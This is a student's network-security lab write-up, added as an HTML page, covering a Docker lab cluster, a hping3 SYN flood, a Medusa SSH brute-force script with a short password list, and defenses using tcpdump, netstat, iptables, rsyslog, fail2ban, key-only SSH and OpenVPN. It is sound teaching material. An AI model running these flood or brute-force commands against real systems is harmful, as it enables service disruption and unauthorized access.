project-sec.html

project-sec.html

@@ -0,0 +1,947 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+  <meta charset="UTF-8">
+  <!--[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]-->
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta name="generator" content="Asciidoctor 1.5.4">
+  <title>Εργασία Χειμερινού Εξαμήνου 2020-21</title>
+  <link rel="stylesheet" href="https://asciidoclive.com/assets/asciidoctor.js/css/asciidoctor.css">
+</head>
+
+<body class="article">
+  <div id="header">
+    <h1>Εργασία Χειμερινού Εξαμήνου 2020-21</h1>
+  </div>
+  <div id="content">
+    <div id="preamble">
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>Μάθημα: Ασφάλεια Δικτύων και Επικοινωνίων<br> Ονοματεπώνυμο: Χρυσούλα Κούτκου<br>            Αριθμός Μητρώου: 71344742</p>
+        </div>
+        <div class="paragraph">
+          <p><br></p>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_docker_installation_ubuntu">1. Docker Installation (Ubuntu)</h2>
+      <div class="sectionbody">
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
+sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
+sudo apt update
+
+sudo apt install -y docker-ce
+ echo   "or"
+sudo apt install docker*
+
+sudo systemctl status docker
+sudo usermod -aG docker username     #οπου username το όνομα του χρήστη που θα δουλεύει με docker</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="cheat-compose">2. docker-compose</h2>
+      <div class="sectionbody">
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code> sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
+ sudo chmod +x /usr/local/bin/docker-compose
+ sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="cheat-error">3. On Error:</h2>
+      <div class="sectionbody">
+        <div class="ulist">
+          <ul>
+            <li>
+              <p>run</p>
+            </li>
+          </ul>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>$ sudo su
+# touch set-ca.sh</code></pre>
+          </div>
+        </div>
+        <div class="ulist">
+          <ul>
+            <li>
+              <p>copy-paste lines</p>
+            </li>
+          </ul>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>registry_address=registry.vlabs.uniwa.gr
+registry_port=5043
+mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
+openssl s_client -showcerts -connect $registry_address:$registry_port &lt; /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' &gt; /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
+registry_port=5080
+mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
+openssl s_client -showcerts -connect $registry_address:$registry_port &lt; /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' &gt; /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
+
+registry_address=hub.swarmlab.io
+registry_port=5443
+mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
+openssl s_client -showcerts -connect $registry_address:$registry_port &lt; /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' &gt; /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
+
+registry_port=5480
+mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
+openssl s_client -showcerts -connect $registry_address:$registry_port &lt; /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' &gt; /etc/docker/certs.d/$registry_address:$registry_port/ca.crt</code></pre>
+          </div>
+        </div>
+        <div class="sect2">
+          <h3 id="_exec_file">3.1. exec file</h3>
+          <div class="listingblock">
+            <div class="content">
+              <pre class="highlight"><code>sudo bash ./set-ca.sh</code></pre>
+            </div>
+          </div>
+          <div class="paragraph">
+            <p><br></p>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_install_swarmlab_sec_home_pc">4. Install swarmlab-sec (Home PC)</h2>
+      <div class="sectionbody">
+        <div class="ulist">
+          <ul>
+            <li>
+              <p>Clone repo <a href="https://git.swarmlab.io:3000/swarmlab/swarmlab-sec"
+                  class="bare" target="_blank">https://git.swarmlab.io:3000/swarmlab/swarmlab-sec</a><br></p>
+            </li>
+          </ul>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_usage_swarmlab_sec">5. Usage (swarmlab-sec)</h2>
+      <div class="sectionbody">
+        <div class="ulist">
+          <ul>
+            <li>
+              <p>Open a console</p>
+            </li>
+            <li>
+              <p>cd to swarmlab-sec</p>
+            </li>
+            <li>
+              <p>Create a directory</p>
+            </li>
+          </ul>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>cd &lt;dir&gt;
+
+../install/usr/share/swarmlab.io/sec/swarmlab-sec
+
+create       create project      (swarmlab-sec create)
+up           start swarmlab-sec  (swarmlab-sec up size=10)
+scale        resize swarmlab-sec (swarmlab-sec scale size=30)
+reload       rebuild image       (swarmlab-sec reload size=15)
+login        login swarmlab-sec  (swarmlab-sec login)
+exec         execute command     (swarmlab-sec exec [SHELL COMMAND])
+down         stop swarmlab-sec   (swarmlab-sec down)
+clean        clean project       (swarmlab-sec clean)
+list         show instances      (swarmlab-sec swarmlab-sec list)
+help         show help           (swarmlab-sec help)</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="cheat-swarmlab-create">6. Create swarmlab project</h2>
+      <div class="sectionbody">
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>mkdir project
+cd project
+../install/usr/share/swarmlab.io/sec/swarmlab-sec create</code></pre>
+          </div>
+        </div>
+        <div class="listingblock">
+          <div class="title">Relevant files:</div>
+          <div class="content">
+            <pre class="highlight"><code>Project
+├── Dockerfile          # Image specification
+├── project             # Sample program source code
+│   └── hello_world.c
+├── ssh                 # keys for accessing
+│   ├── id_rsa          # (could generate your own)
+│   └── id_rsa.pub
+├── docker-compose.yml  # Container orchestration</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="cheat-swarmlab-up">7. Spin up the swarmlab cluster</h2>
+      <div class="sectionbody">
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>cd project
+../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="cheat-swarmlab-up1">8. Login to the swarmlab cluster</h2>
+      <div class="sectionbody">
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>cd project
+../install/usr/share/swarmlab.io/sec/swarmlab-sec login</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>User password: docker</p>
+        </div>
+        <div class="paragraph">
+          <p>Sudo password: docker</p>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_inside_on_docker_master">9. Inside on Docker Master</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>First of all, type ifconfig to see your ip address. Then, create an inventory.yml
+            with the IPs using nmap -sP 172.19.0.* | grep Nmap | cut -d' ' -f5-6</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>[service]
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Afterwards, you have to create a test.yml file.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>---
+- hosts: service
+  remote_user: docker
+  gather_facts: no
+  vars:
+    user: "docker"
+
+  tasks:
+      # -----------------
+      # make directory
+      # -----------------
+    - name: make dir for data
+      become: true
+      file:
+        path: "/var/lab/playground/playground-readmongo"
+        state: directory
+        owner: docker
+        group: docker
+        mode: '0777'
+
+#    - name: google.com
+#      become: yes
+#      become_user: "{{ user }}"
+#      command:  curl http://www.google.com
+#      ignore_errors: yes
+#      register: configwww
+#
+#    - name: ls  configwww
+#      debug: var=configwww.stdout_lines
+
+    - name: ls -al /var/lab/playground/playground-readmongo/
+      become: yes
+      become_user: "{{ user }}"
+      #command:  ls -al /var/lab/playground/playground-readmongo
+      command:  ls -al /etc
+      ignore_errors: yes
+      register: config
+
+    - name: ls  config
+      debug: var=config.stdout_lines
+#
+#    - name: Refresh connection
+#      meta: clear_host_errors</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Then, create a run.sh script.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line, type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x run.sh
+sudo apt install ansible
+./run.sh
+
+(Somewhere here there would be some errors)
+sudo apt install sshpass
+
+cd /etc/ansible
+vi ansible.cfg
+(Add this line)
+host_key_checking = False
+(Exit and return back)
+./run.sh</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_hping3_attack">10. Hping3 Attack</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p><br> Here is a video about hping3, tcpdump, netstat and iptables rules.
+            Feel free to press like button and subscribe!</p>
+        </div>
+        <div class="videoblock">
+          <div class="content">
+            <iframe src="https://www.youtube.com/embed/lErpyiAbsVs?rel=0" frameborder="0" allowfullscreen></iframe>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p><br></p>
+        </div>
+        <div class="paragraph">
+          <p>Firstly, connect to the worker that you wish to do the attack. Inside the
+            worker create a script file with these:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/sh
+#installation_of_hping3
+sudo apt update
+sudo apt install hping3 -y
+
+#syn_flood_attack_with_hping3_on_docker_master_with_IP_172.19.0.2
+#hping3 -i u1 -S -p 80 172.27.0.2
+#hping3 172.27.0.2 -q -n -d 120 -S -p 80 --flood
+hping3 -S -p 80 172.127.0.2</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x hping3.sh
+sudo ./hping3.sh</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_tcpdump_on_the_victim">11. Tcpdump on the victim</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>After connecting to the victim&#8217;s host, then create a script file
+            tcpdump.sh</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/sh
+tcpdump port 80
+#tcpdump -Nnn -i any -s0 'tcp[13] &amp; 2 !=0'</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x tcpdump.sh
+sudo ./tcpdump.sh</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_netstat_on_the_victim">12. Netstat on the victim</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>Create a netstat.sh script file and type the above:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/sh
+
+netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head
+netstat -anp | grep 'tcp\udp' | awk '{print $6}' | cut -d: f1 | sort | uniq -c | sort -n
+netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
+netstat -na
+netstat -tna
+netstat -antlupe
+netstat -n -p | grep SYN_REC | wc -l
+netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x netstat.sh
+sudo ./netstat.sh</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_anti_ddos_protection_using_iptables">13. Anti-Ddos protection using iptables</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>Create an anti-ddos.sh file and type inside:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/sh
+#drop invalid packets
+iptables -A INPUT -m state --state INVALID -j DROP
+iptables -A FORWARD -m state --state INVALID -j DROP
+iptables -A OUTPUT -m state --state INVALID -j DROP
+
+#Use SYNPROXY on all ports (disables connection limiting rule) ###
+iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
+iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
+iptables -A INPUT -m conntrack --ctstate INVALID -j DROP</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x anti-ddos.sh
+sudo ./anti-ddos.sh</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_ssh_brute_force_attack_using_medusa">14. SSH Brute Force Attack using Medusa</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p><br> Here is a video about ssh brute force attack using medusa tool, detection
+            using rsyslog and protection using fail2ban</p>
+        </div>
+        <div class="videoblock">
+          <div class="content">
+            <iframe src="https://www.youtube.com/embed/6C8suUjJBCA?rel=0" frameborder="0" allowfullscreen></iframe>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p><br></p>
+        </div>
+        <div class="paragraph">
+          <p>In order to do this attack, you have to create a password list file. For
+            example,</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>123password
+root
+admin-root
+acbdef2147
+whatistherealpassword
+docker
+password
+123456789</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>The next step is to create a medusa.sh script file.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/bash
+sudo apt update
+sudo apt install medusa
+medusa -u docker -P pass.txt -h 172.27.0.3 -M ssh</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>To accomplish the ssh brute force attack I connected as worker_4 and I
+            will attack the worker_1.</p>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x medusa.sh
+sudo ./medusa.sh</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_detection_of_ssh_brute_force_using_rsyslog_tool">15. Detection of SSH Brute Force using rsyslog tool</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>I will connect as worker_1 and I will create a rsyslog.sh file.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/bash
+sudo apt update
+sudo apt install rsyslog
+sudo service rsyslog start
+sudo service rsyslog status
+sudo grep "Failed password" /var/log/auth.log</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x rsyslog.sh
+sudo ./rsyslog.sh
+(After results are shown type the next line)
+sudo service rsyslog stop</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_fail2ban_tool_for_ssh_protection">16. Fail2ban tool for SSH protection</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>Create a fail2ban.sh file and type the below:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/bash
+sudo apt update
+sudo apt install fail2ban</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x fail2ban.sh
+sudo ./fail2ban.sh</code></pre>
+          </div>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>sudo service fail2ban start
+sudo service fail2ban status
+cd /etc/fail2ban
+cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
+
+(Inside the jail.local type the below)
+
+[DEFAULT]
+loglevel = DEBUG
+logtarget = path_to_log
+
+[sshd]
+enabled = true
+maxretry = 2
+bantime = 600
+findtime = 30
+logpath = %(sshd_log)s
+backend = %(sshd_backend)s
+action = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s, port=ssh, protocol="%(protocol)s", chain=INPUT]</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:`</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>sudo service fail2ban restart
+sudo service fail2ban status
+sudo fail2ban-client start
+sudo fail2ban-client status
+sudo fail2ban-client status sshd</code></pre>
+          </div>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_ssh_brute_authentication_only_with_keys">17. SSH Brute authentication only with keys</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p>To accomplish this brute force login with only key you have to connect
+            to a container, for instance I connected to worker_5.</p>
+        </div>
+        <div class="paragraph">
+          <p>In your command line type:`</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>(Our server is worker_5)
+
+mkdir .ssh
+cd .ssh
+ssh-keygen
+cat ~/.ssh/id_rsa.pub
+
+(You should do the below for every worker, but for this example I will do only about worker_4)
+
+ssh-copy-id docker@172.27.0.5
+
+(Then it will ask you to connect)
+
+ssh docker@172.27.0.5
+
+(After doing this to all remaining containers type the next below for each host)
+
+scp id_rsa docker@172.27.0.5 #copy id_rsa to every container
+sudo service ssh restart</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Then you have to disable password authentication on you server.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>(Being on server)
+
+cd /etc/ssh
+vi sshd_config
+
+(Inside sshd_config change the below)
+
+PasswordAuthentication no
+
+(After doing this return to your command line and type the below)
+
+sudo service ssh restart</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>And finally you are ready!</p>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_vpn">18. VPN</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p><br> Here is a video about how you can create VPN and provide services
+            to docker swarm.</p>
+        </div>
+        <div class="videoblock">
+          <div class="content">
+            <iframe src="https://www.youtube.com/embed/FnRMonM07yQ?rel=0" frameborder="0" allowfullscreen></iframe>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p><br></p>
+        </div>
+        <div class="paragraph">
+          <p>In this part, I will show you how you can create a VPN and and provide
+            services to the docker swarm. Firstly, you shoudld be on the /swarmlab-sec/project
+            folder and create a vpn folder.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>cd swarmlab-sec/project
+mkdir vpn
+cd vpn</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>The next step is to create a create-vpn. script.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/bash
+IP=127.0.0.1                                            # Server IP
+P=1194                                                  # Server Port
+OVPN_SERVER='10.80.0.0/16'                              # VPN Network
+
+#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/   # Dir to save data ** this must exist **
+vpn_data=$PWD/openvpn-services/
+if [ ! -d $vpn_data ]; then
+ mkdir -p $vpn_data
+fi
+
+NAME=swarmlab-vpn-services                              # name of docker service
+DOCKERnetwork=swarmlab-vpn-services-network             # docker network
+docker=registry.vlabs.uniwa.gr:5080/myownvpn            # docker image
+
+docker stop  $NAME					      #stop container
+sleep 1
+docker container rm  $NAME				#rm container
+
+# rm config files
+rm -f $vpn_data/openvpn.conf.*.bak
+rm -f $vpn_data/openvpn.conf
+rm -f $vpn_data/ovpn_env.sh.*.bak
+rm -f $vpn_data/ovpn_env.sh
+
+# create network
+sleep 1
+docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
+
+#run container        see ovpn_genconfig
+docker run --net=none -it -v $vpn_data:/etc/openvpn  -p 1194:1194 --rm $docker ovpn_genconfig  -u udp://$IP:1194 \
+-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
+
+# create pki          see ovpn_initpki
+docker run --net=none -v $vpn_data:/etc/openvpn  --rm -it $docker ovpn_initpki
+
+#                     see ovpn_copy_server_files
+#docker run --net=none -v $vpn_data:/etc/openvpn  --rm $docker ovpn_copy_server_files
+
+#create vpn           see --cap-add=NET_ADMIN
+sleep 1
+docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
+
+sudo sysctl -w net.ipv4.ip_forward=1
+
+#show created
+docker ps</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>create-user.sh</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>USERNAME=user1
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+
+docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME  &gt; $USERNAME.user</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>After the user is created add in the $USERNAME.user the below:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>client
+nobind
+dev tun
+comp-lzo
+resolv-retry infinite
+keepalive 15 60
+
+remote-cert-tls server
+remote 10.0.2.15 1194 udp #type your host IP address in every $USERNAME.user
+float</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>rm-user.sh</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>#!/bin/bash
+
+CLIENTNAME=test1
+U=$CLIENTNAME
+
+vpn_data=$PWD/openvpn-services/
+docker=registry.vlabs.uniwa.gr:5080/myownvpn
+
+rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
+rm -f $vpn_data/pki/private/$CLIENTNAME.key
+rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
+rm -f $vpn_data/server/ccd/$CLIENTNAME
+rm -f $vpn_data/ccd/$CLIENTNAME
+pem=$(sudo grep "CN=$U$"  $vpn_data/pki/index.txt | cut  -f4)
+
+rm -f $vpn_data/pki/certs_by_serial/$pem.pem
+sed -i "/CN=$U$/d"  $vpn_data/pki/index.txt
+echo $pem
+docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient  $CLIENTNAME remove
+
+rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
+rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>show-user.sh</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>NAME=swarmlab-vpn-services                  # name of docker service
+docker exec -it  $NAME ovpn_listclients</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>show-conn-user.sh</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>NAME=swarmlab-vpn-services                 # name of docker service
+docker exec -it  $NAME  cat /tmp/openvpn-status.log</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Then you have to type in your command line:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>chmod +x create-vpn.sh
+chmod +x create-user.sh
+chmod +x show-user.sh
+chmod +x rm-user.sh
+chmod +x show-conn-user.sh
+
+./create-vpn.sh
+./create-user.sh    #for every user you have to use a different name
+./show-user.sh      #you can see all the users
+./show-conn-user.sh #you can see all connected users to the vpn
+
+cp $USERNAME.user ../project    #this user will be copied to the master</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>After doing these steps, connect to a docker host, for instance in docker
+            master.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>sudo apt update
+sudo apt install openvpn
+ls -al #to check if there is the user1.user file
+sudo su
+service openvpn start
+openvpn --config ./user1.user #client connection to the VPN</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Don&#8217;t close the window or do not stop the execution. Open a new window
+            and connect to the same user and type ifconfig to check if the tun0 has
+            created.</p>
+        </div>
+        <div class="paragraph">
+          <p>Now connect to an other worker, for instance worker_1. You have to do the
+            same thing in every worker.</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>ssh docker@@172.27.0.3
+
+sudo apt update
+sudo apt install openvpn
+touch user2.user
+vi user2.user #copy the user2.user file from the /swarmlab-sec/project/vpn/ and paste it here
+
+ls -al #to check if there is the user1.user file
+sudo su
+service openvpn start
+openvpn --config ./user2.user #client connection to the VPN</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>You have to do the same procedure for the other workers.</p>
+        </div>
+        <div class="paragraph">
+          <p>Don&#8217;t close the window or do not stop the execution. Open a new window
+            and connect to the same user and type ifconfig to check if the tun0 has
+            created.</p>
+        </div>
+        <div class="paragraph">
+          <p>Then in docker master tab type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>sudo su
+tcpdump -i tun0</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Go to the new docker worker tab and type:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>ping 10.80.0.2 #this is the new IP of master of tun0</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>You are ready!</p>
+        </div>
+      </div>
+    </div>
+    <div class="sect1">
+      <h2 id="_vpn_2">19. VPN</h2>
+      <div class="sectionbody">
+        <div class="paragraph">
+          <p><br> Here is a video about how you can do ssh local and remote forwarding.</p>
+        </div>
+        <div class="videoblock">
+          <div class="content">
+            <iframe src="https://www.youtube.com/embed/gbegXj8pQxs?rel=0" frameborder="0" allowfullscreen></iframe>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p><br></p>
+        </div>
+        <div class="paragraph">
+          <p>On remote container</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>sudo apt install nginx
+curl localhost #to check if localhost is working
+hostname -i</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>On localhost host</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>curl localhost #to check if localhost is working
+hostname
+hostname -i
+
+sudo ssh -nNT -L 80:localhost:80 docker@172.27.0.2</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>Then type on localhost host again in a new tab:</p>
+        </div>
+        <div class="listingblock">
+          <div class="content">
+            <pre class="highlight"><code>curl localhost #to check if localhost is working</code></pre>
+          </div>
+        </div>
+        <div class="paragraph">
+          <p>And it works!<br></p>
+        </div>
+        <div class="paragraph">
+          <p>Please enjoy and thank you for reading my ascii doc and watching my youtube
+            videos!</p>
+        </div>
+      </div>
+    </div>
+  </div>
+</body>
+
+</html>